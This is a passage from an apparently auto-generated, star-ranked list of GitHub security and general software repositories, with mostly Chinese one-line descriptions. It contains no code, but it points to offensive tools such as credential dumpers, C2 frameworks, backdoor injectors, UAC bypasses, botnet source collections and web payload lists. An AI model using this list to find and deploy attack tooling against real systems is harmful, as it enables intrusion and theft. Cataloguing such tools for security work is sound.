科学上网/梯子/自由上网/翻墙 SS/SSR/V2Ray/Brook 搭建教程\n- [**2709**星][5y] [Java] [linyiqun/dataminingalgorithm](https://github.com/linyiqun/dataminingalgorithm) 数据挖掘18大算法实现以及其他相关经典DM算法\n- [**2703**星][14d] [C] [ckolivas/cgminer](https://github.com/ckolivas/cgminer) ASIC and FPGA miner in c for bitcoin\n- [**2696**星][10d] [Py] [ab77/netflix-proxy](https://github.com/ab77/netflix-proxy) 用于看Netflix/HBO视频的智能DNS代理\n- [**2695**星][10d] [C] [huntergregal/mimipenguin](https://github.com/huntergregal/mimipenguin) dump 当前Linux用户的登录密码\n- [**2688**星][11d] [C++] [fanout/pushpin](https://github.com/fanout/pushpin) 使用C ++编写的反向代理服务器,可以轻松实现WebSocket,HTTP流和HTTP长轮询服务\n- [**2686**星][7d] [Py] [ctfd/ctfd](https://github.com/CTFd/CTFd) CTFs as you need them\n- [**2685**星][10d] [Go] [ne0nd0g/merlin](https://github.com/ne0nd0g/merlin) 用golang编写的一个跨平台的后渗透,HTTP/2命令与控制服务器和代理。\n- [**2683**星][10d] [C] [tsl0922/ttyd](https://github.com/tsl0922/ttyd) 通过web共享您的终端\n- [**2680**星][10d] [C] [martin-ger/esp_wifi_repeater](https://github.com/martin-ger/esp_wifi_repeater) 一个功能齐全的WiFi中继器\n- [**2677**星][10d] [C++] [domoticz/domoticz](https://github.com/domoticz/domoticz) 监控和配置各种设备,如:灯,开关,各种传感器/米,如温度,雨,风,紫外线,电力,煤气,水和更多\n- [**2676**星][7d] [C] [wireshark/wireshark](https://github.com/wireshark/wireshark) Wireshark的Git存储库的只读镜像\n- [**2662**星][9m] [Java] [teevity/ice](https://github.com/teevity/ice) AWS使用工具\n- [**2660**星][10d] [TSQL] [rapid7/metasploitable3](https://github.com/rapid7/metasploitable3) 从头开始构建的具有大量安全漏洞的VM。\n- [**2659**星][12d] [facert/python-data-structure-cn](https://github.com/facert/python-data-structure-cn) problem-solving-with-algorithms-and-data-structure-using-python 中文版\n- [**2655**星][5m] [Shell] [medicean/vulapps](https://github.com/medicean/vulapps) 快速搭建各种漏洞环境(Various vulnerability environment)\n- [**2653**星][10d] [Py] [pritunl/pritunl](https://github.com/pritunl/pritunl) 企业VPN服务器\n- [**2653**星][10d] [Py] [lionsec/katoolin](https://github.com/lionsec/katoolin) 在非Kali系统上自动化安装Kali工具\n- [**2651**星][4m] [Swift] [zhuhaow/nekit](https://github.com/zhuhaow/nekit) 一个网络扩展框架的工具包\n- [**2651**星][8y] [C] [id-software/quake](https://github.com/id-software/quake) Quake GPL源代码\n- [**2647**星][6m] [Go] [owasp/amass](https://github.com/owasp/amass) 帮助信息安全专业人员执行攻击表面的网络映射,并使用开源信息收集和主动侦察技术执行外部资产发现。\n- [**2647**星][10d] [C#] [openhardwaremonitor/openhardwaremonitor](https://github.com/openhardwaremonitor/openhardwaremonitor) Open Hardware Monitor\n- [**2646**星][6m] [Go] [drk1wi/modlishka](https://github.com/drk1wi/modlishka) 一个强大而灵活的HTTP反向代理\n- [**2644**星][15d] [JS] [h2non/toxy](https://github.com/h2non/toxy) 用于弹性测试和模拟网络条件的可破解HTTP代理\n- [**2640**星][5m] [Shell] [rebootuser/linenum](https://github.com/rebootuser/linenum) 脚本化的本地Linux枚举和特权升级检查\n- [**2637**星][6m] [JS] [knownsec/kcon](https://github.com/knownsec/kcon) 一个著名的黑客会议,由Knownsec团队组织\n- [**2629**星][11d] [Java] [google/binnavi](https://github.com/google/binnavi) 二进制分析IDE, 对反汇编代码的控制流程图和调用图进行探查/导航/编辑/注释.(IDA插件的作用是导出反汇编)\n- [**2617**星][2y] [Py] [ecthros/uncaptcha](https://github.com/ecthros/uncaptcha) 绕过谷歌 “I'mnot a robot”reCaptcha 验证,准确率达85%\n- [**2612**星][1y] [JS] [skidding/illustrated-algorithms](https://github.com/skidding/illustrated-algorithms) Interactive algorithm visualizations\n- [**2609**星][10d] [HTML] [dirtycow/dirtycow.github.io](https://github.com/dirtycow/dirtycow.github.io) Dirty COW\n- [**2608**星][3m] [Py] [0xinfection/awesome-waf](https://github.com/0xinfection/awesome-waf) Everything awesome about web application firewalls (WAFs).\n- [**2596**星][10d] [offensive-security/kali-nethunter](https://github.com/offensive-security/kali-nethunter) Kali NetHunter项目\n- [**2588**星][4m] [C] [yrutschle/sslh](https://github.com/yrutschle/sslh) 应用协议多路复用器(例如,在同一端口上共享SSH和HTTPS)。接受指定端口上的连接,并根据对第一个数据包的测试结果将其转发\n- [**2585**星][10d] [Go] [42wim/matterbridge](https://github.com/42wim/matterbridge) bridge between mattermost, IRC, gitter, xmpp, slack, discord, telegram, rocketchat, steam, twitch, ssh-chat, zulip, whatsapp, keybase, matrix, microsoft teams and more with REST API (mattermost not required!)\n- [**2584**星][10d] [Shell] [v1s1t0r1sh3r3/airgeddon](https://github.com/v1s1t0r1sh3r3/airgeddon) 一个用于Linux系统审计无线网络的多用途bash脚本\n- [**2584**星][10d] [Go] [aquasecurity/kube-bench](https://github.com/aquasecurity/kube-bench) 检查Kubernetes是否按照CIS Kubernetes基准中定义的安全最佳实践进行部署\n- [**2579**星][12d] [Py] [x0rz/tweets_analyzer](https://github.com/x0rz/tweets_analyzer) Tweets元数据刮刀和活动分析仪\n- [**2579**星][1y] [ObjC] [nygard/class-dump](https://github.com/nygard/class-dump) 从Mach-O文件生成Objective-C头文件\n- [**2577**星][11d] [Go] [xtaci/kcp-go](https://github.com/xtaci/kcp-go) 通过UDP数据包提供流畅、有弹性、有序、错误检查和匿名传输流,\n- [**2576**星][11d] [Py] [google/nogotofail](https://github.com/google/nogotofail) 帮助开发人员和安全研究人员在设备和应用程序上发现并修复弱TLS / SSL连接问题,定位敏感的明文流量。灵活、可扩展、功能强大\n- [**2574**星][10d] [nahamsec/resources-for-beginner-bug-bounty-hunters](https://github.com/nahamsec/resources-for-beginner-bug-bounty-hunters) A list of resources for those interested in getting started in bug bounties\n- [**2574**星][7d] [C] [mintty/wsltty](https://github.com/mintty/wsltty) Mintty作为Windows / WSL上Ubuntu上Bash的终端\n- [**2573**星][6m] [Py] [ysrc/xunfeng](https://github.com/ysrc/xunfeng) 巡风是一款适用于企业内网的漏洞快速应急,巡航扫描系统。\n- [**2564**星][11d] [JS] [infobyte/faraday](https://github.com/infobyte/faraday) 渗透测试和漏洞管理平台\n- [**2560**星][8m] [kbandla/aptnotes](https://github.com/kbandla/aptnotes) Various public documents, whitepapers and articles about APT campaigns\n- [**2560**星][11d] [Py] [geekan/scrapy-examples](https://github.com/geekan/scrapy-examples) Multifarious Scrapy examples. Spiders for alexa / amazon / douban / douyu / github / linkedin etc.\n- [**2559**星][10d] [Py] [arthepsy/ssh-audit](https://github.com/arthepsy/ssh-audit) SSH server auditing (banner, key exchange, encryption, mac, compression, compatibility, security, etc)\n- [**2559**星][4m] [C#] [stocksharp/stocksharp](https://github.com/stocksharp/stocksharp) 算法交易和量化交易开源平台,开发交易机器人(股票市场、外汇、加密、比特币和期权)。\n- [**2548**星][15d] [evilsocket/bettercap](https://github.com/evilsocket/bettercap) 中间人攻击框架,功能完整,模块化设计,轻便且易于扩展。\n- [**2537**星][10d] [C] [moby/hyperkit](https://github.com/moby/hyperkit) 用于在应用程序中嵌入管理程序功能的工具包\n- [**2535**星][3m] [Java] [m66b/netguard](https://github.com/m66b/netguard) 一个简单的方法来阻止特定应用程序访问互联网\n- [**2533**星][12d] [C++] [pavel-odintsov/fastnetmon](https://github.com/pavel-odintsov/fastnetmon) 快速 DDoS 检测/分析工具,支持 sflow/netflow/mirror\n- [**2526**星][1y] [C#] [yck1509/confuserex](https://github.com/yck1509/confuserex) 一个开源的。net应用程序的免费保护器\n- [**2524**星][3m] [PHP] [misp/misp](https://github.com/misp/misp) 开源威胁情报共享平台\n- [**2522**星][3y] [C] [dhavalkapil/icmptunnel](https://github.com/dhavalkapil/icmptunnel) 透明隧道您的IP流量通过ICMP的回声和答复包。\n- [**2514**星][10d] [Rust] [cloudflare/boringtun](https://github.com/cloudflare/boringtun) WireGuard®协议的一种实现,旨在提高可移植性和速度。\n- [**2513**星][10d] [JS] [pa11y/pa11y](https://github.com/pa11y/pa11y) 自动可访问性测试伙伴\n- [**2505**星][4m] [JS] [vitaly-t/pg-promise](https://github.com/vitaly-t/pg-promise) 用于Node.js的PostgreSQL接口\n- [**2505**星][10d] [JS] [thlorenz/proxyquire](https://github.com/thlorenz/proxyquire) 为了在测试过程中轻松地重写依赖项,同时保持完全不引人注目,nodejs的需求。\n- [**2504**星][8d] [JS] [weixin/miaow](https://github.com/weixin/Miaow) A set of plugins for Sketch include drawing links & marks, UI Kit & Color sync, font & text replacing.\n- [**2503**星][1y] [C++] [chengr28/pcap_dnsproxy](https://github.com/chengr28/pcap_dnsproxy) 基于包捕获的本地DNS服务器\n- [**2502**星][2y] [Py] [feross/spoofmac](https://github.com/feross/spoofmac) 伪造MAC地址(OS X, Windows, Linux)\n- [**2500**星][5m] [C] [hfiref0x/uacme](https://github.com/hfiref0x/uacme) 击败Windows用户帐户控制\n- [**2494**星][3m] [Py] [bowenpay/wechat-spider](https://github.com/bowenpay/wechat-spider) 微信公众号爬虫\n- [**2490**星][12d] [Go] [syncsynchalt/illustrated-tls](https://github.com/syncsynchalt/illustrated-tls) The Illustrated TLS Connection: Every byte explained\n- [**2490**星][11d] [C++] [ggerganov/kbd-audio](https://github.com/ggerganov/kbd-audio) 利用麦克风捕捉到的音频, 分析键盘敲击的按键\n- [**2488**星][6m] [yeyintminthuhtut/awesome-red-teaming](https://github.com/yeyintminthuhtut/awesome-red-teaming) List of Awesome Red Teaming Resources\n- [**2485**星][2m] [Py] [google/enjarify](https://github.com/google/enjarify) 将Dalvik字节码转换为对应的Java字节码\n- [**2482**星][5m] [C] [haad/proxychains](https://github.com/haad/proxychains) 强制任何给定应用程序建立的任何TCP连接通过代理(如TOR或任何其他SOCKS4、SOCKS5或HTTP(S)代理)执行。\n- [**2475**星][14d] [Py] [secretsquirrel/the-backdoor-factory](https://github.com/secretsquirrel/the-backdoor-factory) 为PE, ELF, Mach-O二进制文件添加Shellcode后门\n- [**2474**星][4m] [Py] [wistbean/learn_python3_spider](https://github.com/wistbean/learn_python3_spider) python爬虫教程系列、从0到1学习python爬虫,包括浏览器抓包,手机APP抓包,如 fiddler、mitmproxy,各种爬虫涉及的模块的使用\n- [**2474**星][10d] [Java] [genymobile/gnirehtet](https://github.com/genymobile/gnirehtet) 为Android提供了反向连接\n- [**2468**星][10d] [Py] [guohongze/adminset](https://github.com/guohongze/adminset) 自动化运维平台:CMDB、CD、DevOps、资产管理、任务编排、持续交付、系统监控、运维管理、配置管理\n- [**2467**星][3y] [rpisec/malware](https://github.com/rpisec/malware) Course materials for Malware Analysis by RPISEC\n- [**2458**星][3m] [PS] [k8gege/k8tools](https://github.com/k8gege/k8tools) K8工具合集(内网渗透/提权工具/远程溢出/漏洞利用/扫描工具/密码破解/免杀工具/Exploit/APT/0day/Shellcode/Payload/priviledge/BypassUAC/OverFlow/WebShell/PenTest) Web GetShell Exploit(Struts2/Zimbra/Weblogic/Tomcat/Apache/Jboss/DotNetNuke/zabbix)\n- [**2453**星][10d] [C++] [google/bloaty](https://github.com/google/bloaty) 二进制文件的大小分析器\n- [**2452**星][4m] [Java] [mock-server/mockserver](https://github.com/mock-server/mockserver) MockServer enables easy mocking of any system you integrate with via HTTP or HTTPS with clients written in Java, JavaScript and Ruby. MockServer also includes a proxy that introspects all proxied traffic including encrypted SSL traffic and supports Port Forwarding, Web Proxying (i.e. HTTP proxy), HTTPS Tunneling Proxying (using HTTP CONNECT) and…\n- [**2452**星][4m] [Java] [mock-server/mockserver](https://github.com/mock-server/mockserver) 轻松模拟任何通过HTTP或HTTPS与用Java、JavaScript和Ruby编写的客户端集成的系统。\n- [**2443**星][10d] [Java] [csploit/android](https://github.com/csploit/android) Android上最完整、最先进的IT安全专业工具包。\n- [**2440**星][10d] [edoverflow/bugbounty-cheatsheet](https://github.com/edoverflow/bugbounty-cheatsheet) A list of interesting payloads, tips and tricks for bug bounty hunters.\n- [**2434**星][4m] [Shell] [eliaskotlyar/xiaomi-dafang-hacks](https://github.com/eliaskotlyar/xiaomi-dafang-hacks) 小米DaFang Hacks / XiaoFang 1S / Wyzecam V2 / Wyzecam Pan /其他T20设备\n- [**2432**星][11d] [sobolevn/awesome-cryptography](https://github.com/sobolevn/awesome-cryptography) A curated list of cryptography resources and links.\n- [**2432**星][10d] [JS] [retirejs/retire.js](https://github.com/retirejs/retire.js) 扫描器检测使用JavaScript库已知的漏洞\n- [**2432**星][12d] [TeX] [crypto101/book](https://github.com/crypto101/book) 密码101,密码学的入门书\n- [**2431**星][4m] [security-onion-solutions/security-onion](https://github.com/security-onion-solutions/security-onion) 用于威胁查找、企业安全监视和日志管理的Linux发行版\n- [**2431**星][3y] [Py] [rootphantomer/blasting_dictionary](https://github.com/rootphantomer/blasting_dictionary) 爆破字典\n- [**2431**星][10d] [goq/telegram-list](https://github.com/goq/telegram-list) List of telegram groups, channels & bots // Список интересных групп, каналов и ботов телеграма // Список чатов для программистов\n- [**2431**星][10d] [getlantern/lantern-binaries](https://github.com/getlantern/lantern-binaries) Lantern installers binary downloads.\n- [**2427**星][7d] [Py] [novnc/websockify](https://github.com/novnc/websockify) Websockify is a WebSocket to TCP proxy/bridge. This allows a browser to connect to any application/server/service. Implementations in Python, C, Node.js and Ruby.\n- [**2413**星][1y] [hack-with-github/free-security-ebooks](https://github.com/hack-with-github/free-security-ebooks) Free Security and Hacking eBooks\n- [**2411**星][12d] [Lua] [snabbco/snabb](https://github.com/snabbco/snabb) 网络工具包,简单、快速\n- [**2407**星][1y] [ObjC] [evgenykarkan/ekalgorithms](https://github.com/evgenykarkan/ekalgorithms) EKAlgorithms contains some well known CS algorithms & data structures.\n- [**2406**星][11d] [PHP] [kint-php/kint](https://github.com/kint-php/kint) a powerful and modern PHP debugging tool.\n- [**2405**星][10d] [Shell] [toniblyx/prowler](https://github.com/toniblyx/prowler) 一个执行AWS安全最佳实践评估、审计、事件响应、持续监控、加强和取证准备的安全工具。\n- [**2405**星][14d] [OCaml] [facebookarchive/pfff](https://github.com/facebookarchive/pfff) 一堆工具的集合,用于执行静态分析、代码可视化、代码导航、保持格式的源码转换(例如:源码重构)。完美支持C、Java、JS、PHP,后续将支持其他一大堆语言。\n- [**2397**星][10d] [Py] [therook/subbrute](https://github.com/therook/subbrute) DNS meta查询爬虫,枚举DNS记录和子域名\n- [**2396**星][10d] [Py] [rll/rllab](https://github.com/rll/rllab) rllab is a framework for developing and evaluating reinforcement learning algorithms, fully compatible with OpenAI Gym.\n- [**2396**星][10d] [gbdev/awesome-gbdev](https://github.com/gbdev/awesome-gbdev) A curated list of Game Boy development resources such as tools, docs, emulators, related projects and open-source ROMs.\n- [**2395**星][10d] [C] [stlink-org/stlink](https://github.com/stlink-org/stlink) 开源版本的STMicroelectronics Stlink调试器和编程器\n- [**2393**星][10d] [Go] [google/mtail](https://github.com/google/mtail) 从应用程序日志中提取whitebox监视数据,以便在timeseries数据库中收集\n- [**2391**星][10m] [Go] [mlabouardy/komiser](https://github.com/mlabouardy/komiser) :通过发现隐藏的成本,监控支出的增加,并根据客户的建议做出有影响的改变,保持在预算之下。\n- [**2389**星][10d] [Py] [lmacken/pyrasite](https://github.com/lmacken/pyrasite) 向运行中的 Python进程注入代码\n- [**2388**星][2m] [C] [stefanesser/dumpdecrypted](https://github.com/stefanesser/dumpdecrypted) 转储解密的macho文件从加密的iPhone应用程序从内存到磁盘。\n- [**2388**星][10d] [C] [armmbed/mbedtls](https://github.com/armmbed/mbedtls) 一个开源的、可移植的、易于使用的、可读的、灵活的SSL库\n- [**2386**星][10d] [JS] [dcodeio/bcrypt.js](https://github.com/dcodeio/bcrypt.js) Optimized bcrypt in plain JavaScript with zero dependencies.\n- [**2386**星][8d] [Shell] [pirate/wireguard-docs](https://github.com/pirate/wireguard-docs) 用于WireGuard的API参考指南,包括设置、配置和使用,以及示例。\n- [**2386**星][2y] [Py] [danmcinerney/lans.py](https://github.com/danmcinerney/lans.py) 注入代码并监视wifi用户\n- [**2385**星][12d] [JS] [pedant/safe-java-js-webview-bridge](https://github.com/pedant/safe-java-js-webview-bridge) 为WebView中的Java与JavaScript提供【安全可靠】的多样互通方案\n- [**2385**星][10d] [Go] [projectdiscovery/subfinder](https://github.com/projectdiscovery/subfinder) Subfinder is a subdomain discovery tool that discovers valid subdomains for websites. Designed as a passive framework to be useful for bug bounties and safe for penetration testing.\n- [**2385**星][10d] [JS] [talkingdata/inmap](https://github.com/talkingdata/inmap) 大数据地理可视化\n- [**2367**星][10d] [tylerha97/awesome-reversing](https://github.com/tylerha97/awesome-reversing) A curated list of awesome reversing resources\n- [**2358**星][8d] [Go] [vuvuzela/vuvuzela](https://github.com/vuvuzela/vuvuzela) 隐藏元数据的私有消息传递系统\n- [**2357**星][10d] [Py] [pycqa/bandit](https://github.com/pycqa/bandit) 在Python代码中查找常见的安全问题\n- [**2356**星][1y] [microsoftedge/msedge](https://github.com/microsoftedge/msedge) 微软Edge和Chromium开源:我们的意图\n- [**2348**星][11d] [Py] [elceef/dnstwist](https://github.com/elceef/dnstwist) 域名置换引擎,用于检测打字错误,网络钓鱼和企业间谍活动\n- [**2348**星][10d] [C] [alexaltea/orbital](https://github.com/alexaltea/orbital) 实验ps4模拟器\n- [**2341**星][10d] [Assembly] [pret/pokered](https://github.com/pret/pokered) 口袋妖怪红/蓝反汇编\n- [**2340**星][3m] [C#] [dotnetcore/dotnetspider](https://github.com/dotnetcore/dotnetspider) DotnetSpider, a .NET Standard web crawling library. It is lightweight, efficient and fast high-level web crawling & scraping framework\n- [**2335**星][13d] [C] [abrasive/shairport](https://github.com/abrasive/shairport) Airtunes模拟器\n- [**2333**星][10d] [Go] [mmatczuk/go-http-tunnel](https://github.com/mmatczuk/go-http-tunnel) 通过HTTP/2的快速且安全的隧道\n- [**2331**星][11d] [dumb-password-rules/dumb-password-rules](https://github.com/dumb-password-rules/dumb-password-rules) 用愚蠢的密码规则羞辱网站。\n- [**2327**星][10d] [JS] [jcubic/jquery.terminal](https://github.com/jcubic/jquery.terminal) jQuery终端仿真器-基于web的终端\n- [**2320**星][10d] [Go] [solo-io/gloo](https://github.com/solo-io/gloo) 基于Envoy构建的特性丰富的、kubernets原生的下一代API网关\n- [**2317**星][3m] [C] [aurorawright/luma3ds](https://github.com/aurorawright/luma3ds) Noob-proof (N)3DS“定制固件”\n- [**2308**星][10d] [swiftonsecurity/sysmon-config](https://github.com/swiftonsecurity/sysmon-config) 具有默认高质量事件跟踪的Sysmon配置文件模板\n- [**2299**星][3m] [C#] [hmbsbige/shadowsocksr-windows](https://github.com/hmbsbige/shadowsocksr-windows) ShadowsocksR for Windows\n- [**2292**星][12d] [Py] [commixproject/commix](https://github.com/commixproject/commix) Automated All-in-One OS command injection and exploitation tool.\n- [**2285**星][9m] [C#] [microsoft/git-credential-manager-for-windows](https://github.com/microsoft/git-credential-manager-for-windows) 支持Visual Studio Team Services、GitHub和Bitbucket多因素身份验证,为Windows提供安全的Git凭据存储\n- [**2280**星][10d] [Go] [goodrain/rainbond](https://github.com/goodrain/rainbond) 以企业云原生应用开发、架构、运维、共享、交付为核心的Kubernetes多云赋能平台\n- [**2279**星][11d] [Py] [datasploit/datasploit](https://github.com/DataSploit/datasploit) 对指定目标执行多种侦查技术:企业、人、电话号码、比特币地址等\n- [**2278**星][10d] [C++] [weidai11/cryptopp](https://github.com/weidai11/cryptopp) 免费c++类库的密码方案\n- [**2275**星][11d] [PHP] [antonioribeiro/tracker](https://github.com/antonioribeiro/tracker) 跟踪器从您的请求中收集大量信息以识别和存储\n- [**2270**星][3y] [Go] [mehrdadrad/mylg](https://github.com/mehrdadrad/mylg) 网络诊断工具\n- [**2269**星][3y] [Java] [jackpal/android-terminal-emulator](https://github.com/jackpal/android-terminal-emulator) A VT-100 terminal emulator for the Android OS\n- [**2269**星][10d] [Py] [whaleshark-team/cobra](https://github.com/WhaleShark-Team/cobra) Source Code Security Audit (源代码安全审计)\n- [**2266**星][10d] [Py] [jinfagang/weibo_terminater](https://github.com/jinfagang/weibo_terminater) Final Weibo Crawler Scrap Anything From Weibo, comments, weibo contents, followers, anything. The Terminator\n- [**2266**星][12d] [Py] [scrapy-plugins/scrapy-splash](https://github.com/scrapy-plugins/scrapy-splash) 用于JavaScript集成的Scrapy+Splash\n- [**2263**星][10d] [qazbnm456/awesome-cve-poc](https://github.com/qazbnm456/awesome-cve-poc) CVE PoC列表\n- [**2262**星][10d] [exakat/php-static-analysis-tools](https://github.com/exakat/php-static-analysis-tools) A reviewed list of useful PHP static analysis tools\n- [**2262**星][5m] [JS] [cure53/h5sc](https://github.com/cure53/h5sc) HTML5 Security Cheatsheet - A collection of HTML5 related XSS attack vectors\n- [**2261**星][10d] [Go] [projectcontour/contour](https://github.com/projectcontour/contour) Contour is a Kubernetes ingress controller using Lyft's Envoy proxy.\n- [**2260**星][3m] [hmaverickadams/beginner-network-pentesting](https://github.com/hmaverickadams/beginner-network-pentesting) 初学者网络渗透课程笔记\n- [**2259**星][11d] [Rust] [ebtech/rust-algorithms](https://github.com/ebtech/rust-algorithms) Common data structures and algorithms in Rust\n- [**2259**星][3m] [selierlin/share-ssr-v2ray](https://github.com/selierlin/share-ssr-v2ray) 解决科学上网问题\n- [**2245**星][11d] [C++] [maestron/botnets](https://github.com/maestron/botnets) This is a collection of #botnet source codes, unorganized. For EDUCATIONAL PURPOSES ONLY\n- [**2244**星][12d] [HTML] [kjur/jsrsasign](https://github.com/kjur/jsrsasign) The 'jsrsasign' (RSA-Sign JavaScript Library) is an opensource free cryptography library supporting RSA/RSAPSS/ECDSA/DSA signing/validation, ASN.1, PKCS#1/5/8 private/public key, X.509 certificate, CRL, OCSP, CMS SignedData, TimeStamp, CAdES JSON Web Signature/Token in pure JavaScript.\n- [**2243**星][8d] [PHP] [serghey-rodin/vesta](https://github.com/serghey-rodin/vesta) VESTA控制面板\n- [**2242**星][4m] [HTML] [gtfobins/gtfobins.github.io](https://github.com/gtfobins/gtfobins.github.io) Curated list of Unix binaries that can be exploited to bypass system security restrictions\n- [**2240**星][11d] [Go] [shiyanhui/dht](https://github.com/shiyanhui/dht) BitTorrent DHT协议& DHT Spider。\n- [**2240**星][5y] [Go] [filosottile/heartbleed](https://github.com/filosottile/heartbleed) CVE-2014-0160的检查程序(站点和工具)\n- [**2240**星][10d] [Go] [eth0izzle/shhgit](https://github.com/eth0izzle/shhgit) 监听Github Event API,实时查找Github代码和Gist中的secret和敏感文件\n- [**2238**星][10d] [C] [flatpak/flatpak](https://github.com/flatpak/flatpak) 用于在Linux上构建、分发和运行沙箱桌面应用程序的系统。\n- [**2236**星][3m] [Java] [elderdrivers/edxposed](https://github.com/elderdrivers/edxposed) Riru模块试图提供一个ART挂钩框架(最初用于Android Pie),它提供与OG xpose一致的api,利用YAHFA(或SandHook)挂钩框架,支持Android 8.0 ~ 10。\n- [**2231**星][12d] [JS] [emadehsan/thal](https://github.com/emadehsan/thal) Getting started with Puppeteer and Chrome Headless for Web Scraping\n- [**2230**星][12d] [PHP] [jeremykenedy/laravel-auth](https://github.com/jeremykenedy/laravel-auth) Laravel 7 with user authentication, registration with email confirmation, social media authentication, password recovery, and captcha protection. Uses offical [Bootstrap 4](\n- [**2230**星][5m] [infoslack/awesome-web-hacking](https://github.com/infoslack/awesome-web-hacking) A list of web application security\n- [**2228**星][10d] [Py] [xuefenghuang/lianjia-scrawler](https://github.com/xuefenghuang/lianjia-scrawler) 链家二手房租房在线数据,存量房交易服务平台数据,详细数据分析教程\n- [**2220**星][4m] [Py] [fortynorthsecurity/eyewitness](https://github.com/FortyNorthSecurity/EyeWitness) 给网站做快照,提供服务器Header信息,识别默认凭证等\n- [**2220**星][10d] [C++] [codebutler/firesheep](https://github.com/codebutler/firesheep) 演示HTTP会话劫持攻击的Firefox扩展\n- [**2218**星][11d] [ObjC] [ios-control/ios-deploy](https://github.com/ios-control/ios-deploy) Install and debug iPhone apps from the command line, without using Xcode\n- [**2218**星][12d] [C] [cleanflight/cleanflight](https://github.com/cleanflight/cleanflight) 清理代码版本的基本飞行控制器固件\n- [**2215**星][12d] [Shell] [foospidy/payloads](https://github.com/foospidy/payloads) web 攻击 Payload 集合\n- [**2209**星][10d] [Py] [bisguzar/twitter-scraper](https://github.com/bisguzar/twitter-scraper) Twitter爬虫, 利用Twitter前端API\n- [**2209**星][4m] [Py] [trustedsec/unicorn](https://github.com/trustedsec/unicorn) 通过PowerShell降级攻击, 直接将Shellcode注入到内存\n- [**2207**星][12d] [C] [yarrick/pingfs](https://github.com/yarrick/pingfs) Stores your data in ICMP ping packets\n- [**2207**星][11d] [Go] [theupdateframework/notary](https://github.com/theupdateframework/notary) 允许任何人对任意数据集合具有信任的项目\n- [**2207**星][7d] [Py] [derv82/wifite2](https://github.com/derv82/wifite2) 无线网络审计工具wifite 的升级版/重制版\n- [**2205**星][11d] [Go] [ullaakut/cameradar](https://github.com/Ullaakut/cameradar) 侵入RTSP视频监控摄像头\n- [**2204**星][11d] [Java] [alibaba/alink](https://github.com/alibaba/alink) Alink is the Machine Learning algorithm platform based on Flink, developed by the PAI team of Alibaba computing platform.\n- [**2203**星][4m] [Ruby] [urbanadventurer/whatweb](https://github.com/urbanadventurer/whatweb) 下一代web扫描器\n- [**2201**星][10d] [djadmin/awesome-bug-bounty](https://github.com/djadmin/awesome-bug-bounty) A comprehensive curated list of available Bug Bounty & Disclosure Programs and Write-ups.\n- [**2191**星][8d] [JS] [secgroundzero/warberry](https://github.com/secgroundzero/warberry) WarBerryPi - Tactical Exploitation\n- [**2190**星][2m] [C++] [lordnoteworthy/al-khaser](https://github.com/lordnoteworthy/al-khaser) 在野恶意软件使用的技术:虚拟机,仿真,调试器,沙盒检测。\n- [**2189**星][1y] [jermic/android-crack-tool](https://github.com/jermic/android-crack-tool) 集成了Android开发中常见的一些编译/反编译工具,方便用户对Apk进行逆向分析,提供Apk信息查看功能\n- [**2186**星][9d] [Py] [aoncyberlabs/windows-exploit-suggester](https://github.com/AonCyberLabs/Windows-Exploit-Suggester) 将目标补丁级别与Microsoft漏洞数据库进行比较,以检测目标上可能丢失的补丁\n- [**2186**星][15d] [C] [conorpp/u2f-zero](https://github.com/conorpp/u2f-zero) U2F USB令牌优化了物理安全性、可负担性和样式\n- [**2184**星][11d] [Java] [google/wycheproof](https://github.com/google/wycheproof) 测试密码库,以对抗已知的攻击。\n- [**2184**星][3y] [enddo/awesome-windows-exploitation](https://github.com/enddo/awesome-windows-exploitation) A curated list of awesome Windows Exploitation resources, and shiny things. Inspired by awesom\n- [**2182**星][4m] [Py] [jonathansalwan/ropgadget](https://github.com/jonathansalwan/ropgadget) 在二进制文件中搜索小工具,以促进ROP的开发。支持ELF、PE和Mach-O格式的x86、x64、ARM、ARM64、PowerPC、SPARC和MIPS架构。\n- [**2177**星][10d] [Shell] [arismelachroinos/lscript](https://github.com/arismelachroinos/lscript) 自动化无线渗透和Hacking 任务的脚本\n- [**2176**星][3m] [Py] [sensepost/objection](https://github.com/sensepost/objection) 一个由Frida提供支持的运行时移动探索工具包,可以帮助您评估移动应用程序的安全状态,而不需要越狱。\n- [**2176**星][2y] [Py] [rub-nds/pret](https://github.com/rub-nds/pret) 打印机漏洞利用工具包\n- [**2174**星][3m] [yeahhub/hacking-security-ebooks](https://github.com/yeahhub/hacking-security-ebooks) Top 100 Hacking & Security E-Books (Free Download)\n- [**2174**星][10d] [Assembly] [dwelch67/raspberrypi](https://github.com/dwelch67/raspberrypi) Raspberry Pi ARM based bare metal examples\n- [**2173**星][11d] [Go] [jetstack/kube-lego](https://github.com/jetstack/kube-lego) 从Let's Encrypt自动请求进入资源的Kubernetes的证书\n- [**2172**星][10d] [Py] [nabla-c0d3/sslyze](https://github.com/nabla-c0d3/sslyze) 一个快速而强大的SSL/TLS扫描库。\n- [**2172**星][4m] [JS] [iam4x/pokemongo-webspoof](https://github.com/iam4x/pokemongo-webspoof) 在PokémonGo伪造iOS设备GPS位置\n- [**2170**星][11d] [Py] [aquasecurity/kube-hunter](https://github.com/aquasecurity/kube-hunter) 在Kubernetes集群中寻找安全缺陷\n- [**2169**星][11d] [Py] [fsecurelabs/drozer](https://github.com/FSecureLABS/drozer) 领先的Android安全评估框架。\n- [**2167**星][10d] [C++] [lloyd/node-memwatch](https://github.com/lloyd/node-memwatch) 一个NodeJS库,用于监视内存使用情况,并发现和隔离泄漏。\n- [**2164**星][1y] [Py] [linkedin/qark](https://github.com/linkedin/qark) 查找Android App的漏洞, 支持源码或APK文件\n- [**2157**星][10d] [Py] [calebmadrigal/trackerjacker](https://github.com/calebmadrigal/trackerjacker) 映射你没连接到的Wifi网络, 类似于NMap, 另外可以追踪设备\n- [**2155**星][10d] [C] [shadowsocks/simple-obfs](https://github.com/shadowsocks/simple-obfs) 一个简单的混淆工具\n- [**2154**星][10d] [C] [merbanan/rtl_433](https://github.com/merbanan/rtl_433) 解码来自以433.9 MHz广播的设备(例如温度传感器)的流量\n- [**2154**星][11d] [C++] [asmjit/asmjit](https://github.com/asmjit/asmjit) 完全版x86/x64 JIT和AOT的c++汇编\n- [**2152**星][7y] [Ruby] [plamoni/siriproxy](https://github.com/plamoni/siriproxy) 苹果Siri的代理服务器\n- [**2152**星][10d] [Java] [andotp/andotp](https://github.com/andotp/andotp) Android的开源双因素认证\n- [**2149**星][10d] [C++] [openthread/openthread](https://github.com/openthread/openthread) Thread网络协议的开源实现\n- [**2148**星][2y] [bluscreenofjeff/red-team-infrastructure-wiki](https://github.com/bluscreenofjeff/red-team-infrastructure-wiki) Wiki to collect Red Team 